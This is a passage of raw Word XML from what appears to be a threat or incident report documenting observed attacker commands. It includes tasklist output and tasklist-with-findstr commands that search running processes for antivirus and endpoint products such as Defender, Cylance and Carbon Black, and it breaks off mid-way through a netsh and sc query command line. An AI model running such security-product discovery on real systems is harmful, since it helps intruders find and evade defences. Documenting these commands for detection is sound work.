    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4042BF43" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5BB04262" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tasklist.exe Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="13EF89AA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Image Name                     PID Session Name        Session#    Mem Usage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6780ECFD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>========================= ======== ================ =========== ============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="58108285" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>System Idle Process              0 Services                   0          8 K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0C6C15A4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2986E894" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sysmon.exe                    3176 Services                   0     18,544 K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="379551DA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7671FB19" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0DBAE54C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>tasklist.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="55FB47C9" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7EA0A140">
          <v:rect id="_x0000_i1028" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="23FDC62F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="59A8BC95" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="39579338" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AV (Anti-Virus) Keyword Filtering via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6FB7A52E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">tasklist.exe | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> virus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7348CDBE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">tasklist.exe | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4B09F1C7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">tasklist.exe | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="578D2D98" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5E1AF2F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4AE6CF68" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">All these commands filter the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for AV terms using: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="13AFAA0B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> virus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="551B12A1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0AA691E5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3337A4C8" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cylance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="78B95509" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> mc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="790025F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> "virus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cylance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> mc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="15BC6924" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6C5CD30B">
          <v:rect id="_x0000_i1027" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="781A54C7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="25335A2B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="3E16F179" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other Observed Output (Grouped Commands)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="113A7E3C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">"cmd.exe" /c netsh.exe ... &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> query </w:t>
